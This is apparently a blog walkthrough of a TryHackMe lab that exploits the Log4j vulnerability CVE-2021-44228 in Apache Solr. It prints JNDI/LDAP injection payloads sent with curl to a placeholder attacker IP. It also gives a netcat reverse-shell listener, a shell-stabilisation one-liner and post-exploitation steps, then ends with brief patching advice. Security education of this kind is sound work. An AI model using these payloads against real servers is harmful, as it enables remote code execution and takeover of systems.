What is Log4j?

Log4j is a java package mostly a part of the Apache Logging utility used to capture logs. Everything you do on the internet becomes an event that gets captured in a form of a log. Even your inputs also get captured in logs.

So, in this case, the malicious input gets captured in the log which then results in the execution of the input resulting in remote code execution. That means the attacker is executing the commands using logs.

Currently, the CVSS score of this vulenrability is 10 which makes it critical in severity. The CVE assigned to this vulnerability is CVE-2021-44228.

Practical Demonstartion

We will be using TryHackMe lab - Solar, exploiting log4j for practical purposes.

Step 1 - Reconnaissance

Using NMAP we found on port 8983 is using Apache Solr service which can be vulnerable to log4j.

Step 2 - Discovery

Let us try to find out the endpoint vulnerable to the exploit.

The path is /admin/cores from the log file solr.logs

Let's try to send a malicious request to the endpoint using below payload

curl 'http://webserveraddress:8983/solr/admin/cores?foo=${jndi:ldap://attackerip:9999}'

and turn on the listener to get a reverse shell by nc -nlvp 9999 and execute the payload

We received a signal via some special character that means it's vulnerable.

Step 3 - Exploitation

Let's create an LDAP server locally using marshalsec

executing the server

and create an exploit in java with Netcat listener and HTTP server

Now execute the HTTP, Netcat listeners, and LDAP service

After that execute the exploit

and again execute send the malicious request to the server

curl 'http://serviceip:8983/solr/admin/cores?foo=${jndi:ldap://attackerip:1389/Exploit}'

If everything goes well you will receive a reverse shell on the Netcat listener

Let us stabilize the shell or try to get a persistent shell using

python -c 'import pty; pty.spawn("/bin/bash")'

and check for permissions

From the following output, we infer that there are no restrictions

So we will try to get the solr user access by changing the password solr user using root privileges

and now we ssh as solr user

That is how one can try to exploit this vulnerability. However, the exploitation is not limited as it may have many attack vectors. So better keep hustling.


  1. Keep updating the service
  2. Block exploits by implementing firewall and egress rules

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